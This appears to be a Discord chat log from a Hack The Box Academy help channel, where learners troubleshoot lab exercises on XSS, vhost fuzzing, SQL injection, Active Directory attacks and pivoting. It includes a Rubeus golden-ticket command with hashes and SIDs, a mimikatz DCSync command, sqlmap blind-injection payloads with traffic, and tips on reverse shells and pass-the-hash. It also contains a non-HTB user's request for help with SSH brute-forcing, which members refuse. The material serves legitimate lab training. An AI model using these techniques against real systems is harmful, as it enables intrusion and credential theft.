#modules
@acoustic owl The payload is being injected in the URL parameter, and it is changing things in the body of the HTML.
At least one. I had around 500 after CPTS.
Tier IV modules cost 1000 cubes
Do solutions from one lab to another transfer over in the same module? E.g. I'm currently doing the Footprinting hard lab... I found some credentials in the medium lab; should I try them inside my hard lab?
Exactly. So you have to find a way to make your code valid.
But this code is valid, see once.
Yeah, but if you add them up it will net 1000.
I just added up the cube rewards of each module in all the paths and the total does not amount to 1000.
Not when you inject it
You cannot open another tag within a tag parameter
It could be that I'm calculating it wrong, but I checked twice and it's not enough.
you should have 840 cubes after completing all three paths
That means writing a <script> tag is wrong.
This is not valid HTML:
<tag param="<tag2>blah</tag2>"></tag>

Hey, I'm having a bit of trouble with Password Attacks - Credential Hunting in Windows.
Question: What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)
I used ||Lazagne.exe|| and got a credential, I put it into the answer box and it says it's incorrect, and it is in the right format as well...
What addressing mechanism is used at the Link Layer of the TCP/IP model?
Okay got it
Try not to post spoilers dude. Did you ensure no whitespace?
You don't need to use alert
Is this for a module? Don't outright ask for answers to questions.
This would easily be answered with a quick Google search. 🙂
Or just in the course material tbh.
And don't share your payload as it can be a spoiler
IS NOT MAC AND IS NOT ARP, DON'T THINK I'M STUPID
I don't think you're stupid. Relax.
Maybe you're formatting the answer incorrectly.
But Payload's point is: look where your payload is getting injected.
You need to escape that first
Question. I’m new here. Are we able to go from knowing basically nothing to being relatively proficient using hack the box?
Yeah, I did.
Try different variations of how you can answer that question. You're on the right track with one of those.
Yes. Begin with fundamentals and work your way up from there.
Please stop sharing your payload @copper fox as it can be a spoiler, you're close but not quite there. Why would you use alert? Also look at the source code of the page you're testing on
If you're not testing, you should be able to test it on the /phishing/index.php iirc
It's the payload mentioned in course
Do you guys also have this issue with the black screen of RDP?
And the course isn't tier 0
Press enter
Oh, thanks.
I did, but not receiving desired output
Then your payload is incorrect :)
Again
View the page source
sorry for being rude
Look where your payload is being thrown into
All good 🤷‍♂️, it happens.
The answer just needs a cipher between the words.
I copied and did as mentioned in the course. You can check the payload in the XSS phishing section. The payload used to remove the URL bar.

Glad ya got it.
Did that too
And of course a place for the payload to actually run
Did you view the page source
yea
To see how you might be able to get out of the tag you're thrown into?
should I share?
You must first escape the html tag you're thrown into
then your payload can detonate
But also
alert isn't doing what you think it's doing
Alert pops a message up on the screen
Yeah, but it's not doing that.
sigh
If you're trying to phish someone, why would you have an alert pop up?
You can do this without alert
The module requires knowledge of HTML, CSS and JavaScript. You can't just copy and paste anything anywhere. That will not work
ok
Okay
Nowhere in the phishing section is alert() mentioned.
Right, sorry, my bad.
Anyway
Start from the beginning
Just get any payload to work
Also, as a note, the section gets you 90% of the way there the other 10% is using knowledge from previous sections to actually get it to work
Okay, why I'm feeling you guys are scolding me 😅
In which modules will these be covered in-depth?
I see it a lot, if not in Attacking and Enumerating AD then where should it be? =D
From here https://academy.hackthebox.com/module/143/section/1276
No one scolds you
That's just how you're interpreting it
We try to push you onto the right track
I'm really taking notes, not just putting random payloads. Thank you guys
No no
Maybe something with this
But I'm not sure how much it's covered here.
So not CPTS?
no
Phew
@acoustic owl Man, it worked, thanks a lot again.
I read the source page carefully and found a flaw in that
Guys, I'm in the Pentester path, Information Gathering - Web Edition, skills assessment. I think I have a problem with the box period. I could only solve the first two questions, which were very basic. I tried brute forcing directories and subdomains with different wordlists and nothing shows up; I tried crawling with Scrapy and the .json file is always empty. Idk what the hell I'm supposed to do. I brute forced the vhost and found a few status 400 names, but I can't find them in the browser, yet gobuster decided to show them to me.
Well, 400 isn't going to exist.
Subdomains are the way to go. Top 1 million lists are useful.
Would you need to pay to be able to do that, or is the free version enough?
@lean crane it looks like some of the fundamentals are under the Tier1 which isn't free I believe
The information Security Foundations path (and all tier 0 modules) will give you the cubes you spend back
The box says "vhosts needed for these questions: inlanefreight.htb". Should I look ONLY for inlanefreight.htb? Because I also used a crawler for that and it seems like it's just empty; both brute forcing and crawlers don't give results.
I tried subdomains already
No inlanefreight.htb is just the starting point
There are subdomains
You may need to adjust your filter
Filter?
...yes filtering results
Thanks for the info
You'll need to filter the results you get with ffuf to toss junk results
My terminal is freezing, anyone know why? I am on the Information Security Foundations path, Linux Fundamentals; I have connected to the htb-student machine using my own terminal but it keeps freezing up.
You can either manually set it or use -ac to have ffuf determine automatically
This usually means your connection isn't stable
There's no results if I do "gobuster DNS -d inlanefreight.htb -w subdomains-top1million-110000.txt"
Because DNS isn't running.
As in my internet is bad or the machine is overloaded? Because everything seems fine when I browse the internet using my browser.
You'll need to do vhost fuzzing
"Value 'tun0' is not valid for option 'LHOST'." Why's my Metasploit saying this?
If I'm not mistaken, fundamental modules are Tier 0 and are free.
Try changing vpn regions and reconnect
Not all, it depends on the topic
I stand corrected then 🙂
Some of the "Intro to X" modules are not Tier 0 but are fundamental.
Best to just explore what's available at https://academy.hackthebox.com
"gobuster vhosts -u http://inlanefreight.htb:1234 -w hostnames.txt"?
Well it sounds like you don't have a tun0 interface
--append-domain
How do I get one/fix it?
Do you have your VPN connected?
Well on academy, there's a handy button to download it
All you need to know about the VPN Connection for Academy
Ohh, it's 'cause my VPN thingy wasn't connecting, so I tried doing it without.
Do I have to connect every time I start my VM?
Like download a new file and all? Or reuse the same one?
I've been reusing. I think you only redownload if switching servers.
Can I close the console after connecting or keep it open?
..that I'm not sure. I minimize mine.
You have to keep it open after it connects
When you close it, it stops the process running the openvpn connection
I'm trying to complete the Skill Assessment for Using Web Proxies and I'm having some trouble with the final question
I was corrected on this, if you didn't see.
Some are free, some are not.
Just check what's available at https://academy.hackthebox.com
I'm setting the PROXIES option within msfconsole to 127.0.0.1:8080, but Burpsuite isn't intercepting it
So it found one domain but it doesn't load even with curl command. How can a DNS server not run if a website is supposed to have subdomains?
add to hosts file
You need to add it to your hosts file
You need to specify type
HTTP:127.0.0.1:8080
Ohhhhhhh
If it were a socks proxy you'd do socks:ip:port... and so on
Why do I keep getting the command "Msf::OptionValidateError The following options failed to validate: RHOSTS"?
How did gobuster find it if my VM can't load the page without that specific subdomain being on etc/hosts?
It manipulates the host header
What does your RHOST look like?
83.136.255.40:47016
You specify the port separately
Also you can't get a reverse shell on public hosts
I'm trynna do the IP that the module gave me.
So I do set RHOSTS 83.136.255.40 only?
So if your exploit is a reverse shell of some kind, it's the wrong exploit
With gobuster add --append-domain
Anyone have a fix for BloodHound data just stuck uploading forever?
@fathom pendant what magic do you know about this
Tried that, happens with almost every single machine I do it on.
It works flawlessly with the Python version but I can't use it in this case.
Like there's a 95% chance the data will not work.
I've not had many issues with data grabbed from SharpHound on the AD enum boxes.
So basically, when I am trying to find subdomains of a vhost, you shouldn't use the DNS flag in gobuster but vhost and --append-domain, right?
Generally yes but it depends
The DNS flag relies on DNS servers to resolve,
I.e. directly trying subdomain.example.com
Instead of host header manipulation
Where it asks the server you're attacking directly
Hey does the host subdomain.example.com exist specifically on this host?
DNS uses public DNS servers.
vhost uses the site itself that you're targeting.
Small question: I just finished the Footprinting hard lab, and I think a little by chance. How should I have known that particular services were running on the device? Was it correct of me to just guess ps -aux | grep service-name based on the files of the user I found?
I believe the one you're talking about explicitly mentions the service is running
In one of the things you may have read
It doesn't; the leading text is:
The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.
Key words that stand out to me;
backup, MX, management
Generally if something is a backup of internal accounts there may just be a database running
I see, but it could have been any kind of database, no?
This is where the assumption can come into play. What databases were you taught, and what's most likely from the module
But go over all discovered information. Even a seemingly random txt file could key you in
Also
always scan the targets that are 10.129.x.x
Don't assume htb is giving you all the information
Just enough to get started
But assuming things in the enumeration phase can lead to needing to re-enumerate your baseline later
Scanning 10.129.x.x didn't reveal the above ^
At least for me; maybe my scan was off.
Well if a service is only running internally, it may not reveal anything
If you're curious as well about running services, netstat is a useful command
Instead of just ps aux which gives process info
Guys, when I run a command that takes a lot of time to execute, is there a way to cancel it?
Control-C
Ctrl-C
Cancel this shit bc I think I fucked up with how long it's taking.
Story of my life.
And I'm grepping all around, can't find it still.
As a note, not everything in this field is instant gratification
Sometimes you do have to wait upwards of 30+ minutes for a command to work
Thanks for the info, but right now I'm in a period of thinking "is this command supposed to take this long to execute or have I written something very stupid that made my terminal freeze".
I guess it comes with the experience.
What module and section?
Linux Fundamentals, System Information.
I have a task to find the email of the user.
Ah
This question is actually really easy
Look through the listed commands and see what each do
One of them will give you a useful bit of info about a lot of things about your environment.
Also as a note, the filepath doesn't need to exist to be assigned
Thanks, I'll try to find it. I have been going through various file directories trying to find it.
Let the os work for you
Also if it wasn't clear, this was a veiled hint
Alright, that was easy. The thing is that I had already found a path earlier but I forgot to include the username in the file path.
Thanks 👍
The username is part of the path. It'd be specifically a directory in the base path for the user 😉
Because that directory doesn't exist
As said
A directory doesn't need to exist for it to be assigned to a path
Alongside that, this is done on purpose
It is to have you go through other enumeration commands
Hey guys. I wondered if anyone could give me a hint about that last question of the DACL Attacks II skills assessment; I got every user. The hint isn't really helping. Thx!
Need help in a CBBH module
I need help with Broken Authentication - Skills Assessment. I have brute forced a user and password. I can't brute force the OTP, and I read that it is not the way. I can't figure out how to bypass it; I have tried registering a user and seeing the difference but still no clue. Can anyone help?
So if it doesn't exist, how can it be used? I'm sorry if this is a really noob question, I'm new to all this.
Oh it 100% would likely break, or be created when it's first needed
But you can assign any value to a variable
Doesn't make it correct
Huh
Am I confused?
What does that mean?
You can assign MAIL=/nonexistent/directory
So as I understand it, a path is a bit different term from the actual current file directory, in that it will be generated when needed even though it currently does not exist? And all of that is stored in the env directory?
env isn't a directory
Never mind, figured it out.
Sorry, a command.
They are assigned variables that depend on context and program utilizing them
Like how LS_COLORS dictates the colors of the different file extensions
That's cool, I think I get it.
I had that problem because my godpotato-net4.exe was 0 bytes. Firefox didn't fully download it because it thought it was harmful.
Please, how do I spawn up the HTB VPN on my Kali machine?
I have downloaded it already; I worked with it yesterday, but cannot SSH into the target machine today.
sudo openvpn /path/to/file.ovpn
Hello again. I'm using ChatGPT for some part of the explanations in the modules; am I valid or no?
Is anyone else doing what I am doing?
Sure, but I'd also take notes.
thanks
Yeah, I am currently doing that as well. I have seen a lot of other people's notes; it's just a list of commands usually. I have been writing notes and points; I am not sure if the way I am doing it is appropriate or not.
If you didn't know, you don't need to re-download it every time; you can just re-use the same file. I'd suggest putting the openvpn command down in your notes. Also, protip: if you use & at the end of your command it'll drop it into the background and you can close the terminal. sudo openvpn /path/to/file.ovpn & like that.
If you know how, you can also make an alias to run it a bit easier.
I use: sudo openvpn --config /path/to/file.ovpn
It's easy, just edit .bashrc
I know.
nano ~/.bashrc
I use "acad" to run the academy VPN.
and add this line: alias alias_name='command'
.zsh on Kali
Got that for the labs
There is a Footprinting module, Oracle TNS section, where the section provides a bash script. But it's not running as it is supposed to. I addressed this matter earlier as well.
@fathom pendant could you help with this?
Here
What exactly is your question?
You don't really provide any info, so kinda hard to help.
"It doesn't work" isn't a good description.
There's a stack trace after the linked message; either make a Python venv or install odat via apt.
Can someone help me with AD Fundamentals?
The module https://academy.hackthebox.com/module/74/section/1350
describes an NTLMv2 Challenge/Response example and I can't seem to decipher what is meant by SC/CC (server->client? client->client? don't think that's right).
SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*
Edit: never mind, SC stands for Server Challenge and CC for Client Challenge, respectively.
I did. Follow-up from my reply here.
I'm not able to properly execute the bash script provided in the Oracle TNS section (to set up odat). The pip3 packages are not installable; it gives an error (need to create a virtual environment, etc.; you can see more detail in the follow-up message above that I provided when asking the question).
Are you using pyenv or venv? You should be using venv; I think pyenv is deprecated.
This tripped me up as a returning Python user a few months back as well.
@grand portal ^
Also make sure your venv is set to PATH; the venv autoconfig wizard should check this and alert you.
added to PATH*, but you know what I'm saying
I'm using venv. But that bash script is not working; someone should update it. I don't get why it is working on Pwnbox. I tried re-installing the VM on my local, still not working. Anyway, I hope you're doing fine.
Yeah, I'm doing alright. Any relevant terminal output with the cmd?
I'm trying to use pipx instead of pip3 from the bash script. pipx is used to isolate the Python environment, and it's used to install command-line tools. That's what we want. So I'll keep you posted here, if it works as I hope.
OK, so yeah, don't do that, or at least the REALLY NICE folks over at #python on Libera told me not to. pipx defaults to the system install of Python; you need to set up your venv then use pip from your newly created environment.
Do which pip3 to make sure it's defaulting to your venv.
I ran into a very similar issue.
Let me see if I can get you some terminal output to help guide you.
Is that a problem? It makes scripts like mssqlclient.py available system-wide on any terminal. I don't see pip3 doing that. I'd have to manually enable the virtual environment?
Alright. Brb
venv pip3 won't make it global, but do you /need/ that?
I don't need that really. But I want to run Python scripts system-wide. Using pip3, will I be able to run mssqlclient.py from any terminal? Did you try?
Bash script result from the Oracle TNS section. I know which commands are giving those errors:
- pip3 install cx_Oracle
- sudo pip3 install colorlog termcolor passlib python-libnmap
- pip3 install pycryptodome
You can and probably should use projects designed for terminal use like impacket/netexec with pipx; basically, use the documented way to install. For more complex projects like odat you'll want to create a venv. But again, odat is available in apt.
I don't understand pip3 and virtual environments. If pip3 is responsible for installing packages virtually, then the installed packages can't be accessed outside the virtualization, right? I don't get why they provided that bash script; it needs changes. Or maybe my system is not set up to run it, because Pwnbox ran it without issues.
pip3 installs packages depending on whether it's inside a venv or not.
If the script works for Pwnbox then it works; they can't account for the differences in every system.
Hey guys
For Skills Assessment 1 of Common Applications I found the vulnerability; I can list the directory /Desktop but am unable to use type to read the flag, and there is no access.cgi file to try to get a reverse shell.
I'm using the HackTheBox edition of Parrot OS locally. Shouldn't this be the same as Pwnbox?
That's Pwnbox, says it right there.
So the download button is for Parrot OS, not the Pwnbox?
That's bad, I can't customise my VM as I go through the process. Wish there was a Pwnbox download. Guess it's proprietary.
Wdym you can't customise your VM? It's your own VM, do whatever you want with it.
It gets reset every time I log out, doesn't it?
What? Whatever you do in your VM stays; it's Pwnbox that gets reset.
Hi everyone, I am doing "Stored XSS" section of "Cross Site Scripting" module https://academy.hackthebox.com/module/103/section/967, and I completed the question. But I do not understand how is it "stealing" cookie? The malicious XSS payload that we add to get the cookie is stored in the database? Sure. But when another user views the same task and the code gets executed, it is executed in the context of that user itself. This means, each user will see their own cookie, which is not bad. So, how does it allow me to view other user's cookies?
Hello, I'm doing the Broken Authentication Skills Assessment. I got through the login, but I got stuck when submitting 2FA: it redirects me to login instead.
For example, using Burp Collaborator or using a webhook, you modify your payload and let it send the cookie to you. Sorry, my explanation is bad.
Wait till you reach the Session Hijacking section.
The section you just did just asks you to execute JS to show yourself the cookie. There aren't any cookie stealing techniques being taught in there.
Of course I can customise my own VM, but Pwnbox locally as a VM would have been a blessing. Anyway, Parrot is just fine as well; just gotta make changes once in a while.
Pwnbox is Parrot.
if you want to configure it you can do it via ansible - https://www.youtube.com/watch?v=2y68gluYTcc
The GitHub repo: https://github.com/IppSec/parrot-build
Anyone to answer?
The interface of the Parrot OS website has changed a bit; I'm a bit confused how to download exactly the Pwnbox VM. Can you see the link?
You can navigate it, it is not that hard.
Gotcha. However, the interface has gotten weird.
¯\_(ツ)_/¯
There's no download specific for the Pwnbox VM.
Actually, I think there is.
The HTB edition is close but it isn't exact.
I see. Still better than other editions.
Not really lmao
How so? I'm using Security Edition so far.
HTB edition is just Security Edition with a trench coat.
What, really? I thought I would not have to manually install many tools. Just an offline Pwnbox.
You'll still have to install tools.
Even on the Pwnbox you need to install tools.
The advantage to using your own vm is:
You aren't relying on a third party for your vm, so you always have access to it
Persistence, tools you install remain installed
Version control, you have more control over the version of tools you install
Thanks, that's been helpful. I've been using security edition so far. gonna continue using it.
Hello everyone!
I enrolled in the SOC Analyst path and I am stuck at the module "Cyber Kill Chain" at the question "In which stage of the cyber kill chain is malware developed?". I try the answer "weaponize" but I get an error and incorrect answer.
Why is this happening? I believe that this is the correct answer.
Anyone felt like the skills assessment in Security Monitoring & SIEM Fundamentals isn't quite on point? I mean, what's the difference between escalating to tier 2/3 or consulting the IT admins?
Watch out for capitalization or trailing whitespace.
Thanks! 🙏
Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Performing a DCSync Attack
Can someone tell if I'm doing something wrong?
Ticket is cached and PS running as Administrator.
Can you explain what you have done until this point? I suspect it may be an error associated with the version of mimikatz... You can Google the error shown on the last line and try an older version.
The mimikatz on the targets should be fine
The ticket caching thing can be finicky
I remember fighting this for a bit to get it working
Hi! If I have some questions about the Practical Digital Forensics Scenario, is it in #1234357888114364508?
I need some help with a question inside the module.
You can ask your question here.
Don't ask to ask. Just ask.
I did the following
Creating a Golden Ticket using Rubeus
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
Confirming the Ticket is in Memory Using klist
PS C:\htb> klist
Performing a DCSync Attack
PS C:\Tools\mimikatz\x64> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm
#1234357888114364508 is for reporting errors
Ooooh, okay, thanks!
Which module is it?
Attacking and Enumerating Active Directory https://academy.hackthebox.com/module/143/section/1457#:~:text=Domain Admin user.-,Performing a DCSync Attack,-Attacking Domain Trusts
Your steps seem fine... However, try to add the domain to your command and see if it works: lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL
Introduction to Digital Forensics
Practical Digital Forensics Scenario
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744.
I found the answer with some luck, but I don't understand the process to find it legitimately. To avoid spoilers, we can go to DMs from here.
I see. Have not completed this module.
Same happened with me, but somebody once told me there is no luck in such cases; you just discovered one of many methods to reach the answer.
Maybe I should've just read a bit further..
No, it's just luck here; I found the PowerSploit GitHub and tried 2 tools.
But I very much need to understand the path.
You found PowerSploit; you then match what the process did to what PowerSploit module does that thing.
Yes, but I don't understand what the process did even after decoding the base64 strings twice.
I found the encoded strings in the command line of the process; I decoded once, twice, and then I don't know where to search, haha.
Stuck here, ||SharpHound|| is very slow.
Modern Web Exploitation Techniques > Skills Assessment
Heys guys
Stuck on getting the password for "htb-stdnt" and "admin" users, any hint or nudge on the right direction would be really appreciated. Been stuck on this for a couple of days now and I'm not sure what I'm missing.
- ||Sqli via websockets from library endpoint|| doesn't reveal any password in database
- Tried ||sql on|| vault endpoint
- Tried ||password brute force on|| vault endpoint
- Tried ||command injection||
- Tried ||directory brute force||
- Tried to ||access vault.php, profile.php, config.php, db.php after an incorrect login attempt without following redirection, to check if session was temporarily valid||
Feel like there's nothing else to work with here
Thanks
What exactly should I read again? The module is about dns rebinding, second-order vulnerabilities, and websockets. I would probably be able to exploit this endpoint using ||websockets ||if there was some way to interact with another user, which isn't the case here. Can't find any second-order vulnerability, and dns rebinding isn't possible without pointing the victims dns configuration to my dns server. No doubt it's some simple detail I missed, but it's been a couple of days and I would really appreciate any concrete tip in the right direction.
It shouldn't take too long, just a bit more than the default timeout.
Started one hour ago with default collection method, still waiting
Hi guys, I am doing the Windows Fundamentals module. I have a problem in terms of connecting to the target; I am also not able to ping it. This is the first time it has happened; I have done the CBBH path without this problem, and boxes from the app. Any insights?
And also even the Pwnbox is not able to connect to the target host.
Hello, could someone help me? I'm new around here and I can't type in #general.
Did you verify your htb account using /verify in #bot-commands
Oh no
Try that maybe
Was anyone able to do this section or not? https://academy.hackthebox.com/module/113/section/1097
Module "Tunneling and Port Forwarding". Good morning colleagues, I'm stuck on the next question: "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." I am trying to access the external web server in the following way, and I have already configured tunneling as the module says, but I do not have access: python2.7 rpivot/client.py --server-ip 0.0.0.0 --server-port 8080 --ntlm-proxy-ip 172.16.5.129 --ntlm-proxy-port 8081 --domain inlanefreight --username victor --password pass@123
Due to the many CPTS certificates and the fact that the completion of this module is a prerequisite for being admitted to CPTS, I assume that some have completed this module. So the answer to your question is clearly yes 😉
No, but I misunderstood, lol. I asked a question about Skills Assessment 1.
Just here.
Is it normal for type not to work?
Do you have read permission for the file?
Yes, it's normal; a lot of commands may not work through CGI even if you specify the full path... So you'll have to dig deeper to see what works... Try to get a reverse shell also, because it's possible.
https://lolbas-project.github.io can be useful
OK, I understand, thank you.
no, I don't think so, since he doesn't do it.
Can you help me
With what exactly do you have no access?
I don't have access to the external server to see the flag.
You need to set up the pivot on the internal machine (10.129.x.x) to pivot through
Hello, I really need help getting my head around a question in the CBBH: MySQLMap Module
In the first question in the Attack Tuning section, it asks for a flag that can be obtained through an (OR) SQLi vulnerability...
I tried doing it manually but no success... so I fired up sqlmap and managed to obtain the flag...
Anyway, I managed to get the flag but I don't understand how sqlmap retrieved this data... I turned the verbosity up to the max, enabled debugging, and traced all the HTTP requests that sqlmap made,
and managed to find the query payload that sqlmap used to retrieve the flag (it's in the screenshot below)... however, when I try using the same payload manually in the browser I get no results whatsoever...
What am I missing here... why can't I replicate it manually? Someone help, I'm losing my mind, lol.
This is the part of the HTTP request history that shows the payload that sqlmap used successfully to retrieve the flag from the 'flag5' table in the 'testdb' database:
```
[07:34:51] [TRAFFIC IN] HTTP response [#544] (200 OK):
Date: Tue, 27 Aug 2024 11:34:50 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2473
Connection: close
Content-Type: text/html; charset=UTF-8
URI: http://94.237.48.203:38759/case5.php?id=-2723 OR ORD(MID((SELECT content FROM testdb.flag5 ORDER BY id LIMIT 0%2C1)%2C31%2C1))>124
[07:34:51] [INFO] retrieved: HTB{700_much_r15k_bu7_w0r7h_17}
[07:34:51] [DEBUG] performed 228 queries in 14.08 seconds
[07:34:51] [INFO] retrieving the length of query output
[07:34:51] [PAYLOAD] -8722 OR ORD(MID((SELECT CHAR_LENGTH(id) FROM testdb.flag5 ORDER BY id LIMIT 0,1),1,1))>51
[07:34:51] [TRAFFIC OUT] HTTP request [#545]:
GET /case5.php?id=-8722%20OR%20ORD%28MID%28%28SELECT%20CHAR_LENGTH%28id%29%20FROM%20testdb.flag5%20ORDER%20BY%20id%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E51 HTTP/1.1
Cache-Control: no-cache
User-Agent: sqlmap/1.8.7#stable (https://sqlmap.org)
Referer: http://94.237.48.203:38759/case5.php
Host: 94.237.48.203:38759
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close
```
My initial assumption is that this is a blind vulnerability,
based on the fact that it sent 228 queries.
What is the full description of the SQL vulnerability?
It should say something like:
```
Parameter: test (GET)
Type: time-based blind
Title: OR time-based blind - X or Y clause
Payload: test=dfSf' OR ...
```
Same thoughts as @ember fern
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://94.237.59.63:38407/case5.php?id=-6195 OR 1585=1585
Vector: OR [INFERENCE]
If you're thinking that using the payload in browser is going to give you the flag in one request, it won't.
Blind-based attacks work by having an integral script in sqlmap that automates the process of extracting data with a lot of requests, one by one.
Based on a true or false condition
Aha I see...so the part in the http request history which said "information received: HTB{.........}" was a result of multiple payloads and requests and not attributed just to the payload and request that was mentioned right above it...correct?
Correct
Yeah makes sense now... thanks a lot @misty current @ember fern
That does not sound right, it definitely did not take that long for me
yeah so it's basically running a binary search to extract the flag via boolean-based blind
it's automated
(and a little magic)
Does anyone know if we can run Responder from our attacker machine through a pivot tunnel made with Ligolo?
Or do I need to run responder from a machine within the internal network since it won't work through pivoting
LLMNR works by sending a multicast packet on the network segment at 224.0.0.252:5355, so it needs to be run from the compromised machine in the internal network.
There may be some network fuckery you can do by configuring a reverse port forward for 224.0.0.252:5355 on the internal machine to send traffic back to the attacker machine and run responder on the attacker to catch it like that, though I have not tried it.
Hello, can I ask anyone about the advanced deserialization attack module, skills assessments?
?
Just ask your question
for the blacklisted keyword on the skills assessment I doubt it's possible to execute a command without System.Diagnostics.Process
Any one completed "ADVANCED XSS AND CSRF EXPLOITATION" section "XSS Filter Bypasses"?
I managed to bypass using an <object> or <iframe> payload but can't trigger the admin page
Is this the support channel for general HTBA login issues?
I have an issue logging into HTBA. My accounts are linked and I am using the correct password, but when trying to log in to HTBA it says "These credentials do not match our records. If you have an HTB Account, please proceed connecting through your HTB Account." This is even after I am already logged in within that browser, but it pulled up a new page. It's a very kludgy interface.
No
Where is it?
Reach out to support via the green bubble on the website
I was able to find the flag but I have a lot of questions x) for skills assessment 1 of Common Applications
Need to speak to a person? Learn how to reach our support via HTB Labs.
You need to log in via the HTB account option
Getting to support is also kludgy 👍
Try logging in via HTB account
for my understanding I would like to know if the creator of the challenge has filtered the command type during the execution command found in the /cgi directory. If it's filtered, shouldn't we be able to access the command from our reverse shell? If so, I'd like to know why.
I don't see and I do have ad block enabled. Very odd that they implemented it in this way. Thanks!
Need to speak to a person? Learn how to reach our support via HTB Labs.
It's a pain in the ass
Getting to support? Seems to be
It's because intercomcdn (for some reason) is blocked by adblockers
ok so don't understand lol just say it works
or you can see the module's creator. I'd love to ask him 🙂 because it tortures me to know that I can list the desktop content on the url but not read the directory content with type cmd
nudge appreciated, anyone?
Still need help with that?
yes
Finished it a while back but don't remember that well, gimme a min to spin up my vm
Hey man sorry for the wait, dm me.
ok
Does anyone know how to XML Filter Event Viewer? I'm trying to filter my events for unsigned events.
Finally it's OK for the advanced deserialization attack. Done
Question within the Windows Lateral Movement RDP section. The question I'm stuck on is:
"Use NetExec to conduct an RDP Password Spray using the hash 'A35289033D176ABAAF6BEAA0AA681400'. Which user successfully authenticated?"
-
I have tried cracking the hash to no avail and I have attempted to use Netexec with the '-p' switch which has not been able to authenticate. I'm a bit confused because:
-
Netexec doesn't explicitly state in its documentation that it supports pass the hash, so I'm not sure what the switch would be to attempt it
The first target host "SRV01" does not have RestrictedAdmin Mode enabled, nor does it have the corresponding registry at all. I was able to use powershell and determine 'SRV02' does have it, but the question doesn't state to spray to that? I'm just a bit lost
I suppose maybe when I used Get-AD I didn't pull enough of the right users? Or again, not sure if the question wants me to crack the hash (I've gotten weird results with Hashcat), or if it just wants me to realize that SRV02 has RestrictedAdmin and to try there. Additionally the first account you discover on the first target machine does not have admin perms, so can't create the related registry
As far as I'm aware, the registry key is DisableRestrictedAdmin and it looks like your interpretation of the situation may be backwards.
Still it’s not enabled
Or rather, not there at all
But I don’t even think that is the main issue here. The main issue is nowhere within netexec documentation does it outline support for “spraying” with hashes.
Anyone can give a nudge on the "Whitebox Attacks" Module - Section Client-Side Prototype Pollution?
I found the GET parameter needed for elevating my privileges, got a valid payload to send an HTTP GET request, tested against my server, but when I send it to the admin via the input form, I still can't get access.
Tried via $.get and fetch.
Good god. Finally.
That was fun, but lots of unfamiliar territory to work with 🙂
https://academy.hackthebox.com/achievement/698577/112
"1. Netexec doesn't explicitly state in its documentation that it supports pass the hash, so I'm not sure what the switch would be to attempt it"
You can use "--help" and see what flag is needed to use NTLM hash authentication instead of password auth.
You don't "spray" with hashes
That is the wording in the module not mine
Good point!
It will iterate over a username wordlist with an NTLM hash, so it's pretty much alike
That's fair
-H flag
I was thinking from the perspective of having obtained the hash yourself via dumps
Where you'd have the corresponding username
That module dragged by the end and I have plenty of prior experience with most of the services covered. 😅
it goes without saying that i learned a lot which is good
and which is why it took me like a week total to get through.
Can somebody help me with Attacking DNS (Attacking Common Services) ? I actually found the flag, but I don't understand something.
||subbrute inlanefreight.htb -r ./resolvers.txt||
subbrute is working
but if I try the same with dnsrecon, it says "Could not resolve domain: inlanefreight.htb"
||dnsrecon -d inlanefreight.htb -n 10.129.203.6||
Can somebody help me solve an error arising while using hydra (brute-force password cracking tool): "cannot connect to ssh"
Have you set the correct port?
Means
I tried literally everything!!
Can you recommend some command to correct it
What’s your command
Wait, let me send my screen capture
Did u use the -s flag for port?
Just the command and output please
Exactly my thought
Bru
What??
Are you connected to the vpn?
Wanna hack me 💀
😭
No
No, actually I was learning with some random Russians
And I'm stuck there, though the example I took is from the internet
Hey can you help me
What module are u even on?
Basically I'm a newbie
So you cannot expect much from me
Are u on the htb website?
But the team I am working with is international (Russian,Dutch etc.)
What room bro
Sorry bud i cannot
😵
If you can’t state the module and section you’re on, we can’t help
Are you referring from htb ??
Then do so
Like you ask my htb module
Name the module and section you’re working on.
I am confused (what are you asking for? I'm just learning (though I am self-confused too))
I'm just working on brute force
Where did you get that IP?
It's for practice
I have many more (cuz of Russian friends)
Wait, why did u choose a single name and a password for hydra
Nmap
can you link the website from where you are learning brother?
?
Sorry bud!! I'm not learning from any website
this discord and channel are for a specific website
I'm certain no one can help you with what you are asking
It's a practice example given on web
Then we can’t help you. This place is for hack the box and not just random hacking
Can you tell me some other server where hackers are ??
no
Plsss brother !!
It’s a private ip address and ur not on the vpn bro
No.
Shitttttt
And u def don’t have a container up 😭
Thanks, let me activate my VPN 😂 (fuckkkkk, how am I supposed to do this?)
he already made it clear he isn't learning from htb
Where did u even get that ip😭
I'm certain he won't know about the dockers
Yaaa I'm not
from his russian friends
We can’t help you further buddy. Ask your friends.
Cause HTB or any other resources possess constraints. But random learning doesn't have limits
Ok thank you for your time buddy
People still try
I get it why you guys get pissed sometimes
honestly the mods and community contributors have a lot of patience
Actually I'm not even there 1%, they are not hackers, they are Russian hackers. And I have a fear of getting hacked; still I'm learning from them, but fear is fear
U don’t even know how to connect to the ip yet bro
Anyway
anyone facing issues with RDP ?
I'm just learning cause my brother is senior in this field; he connected me with Discord and the Russians, and he is so rude
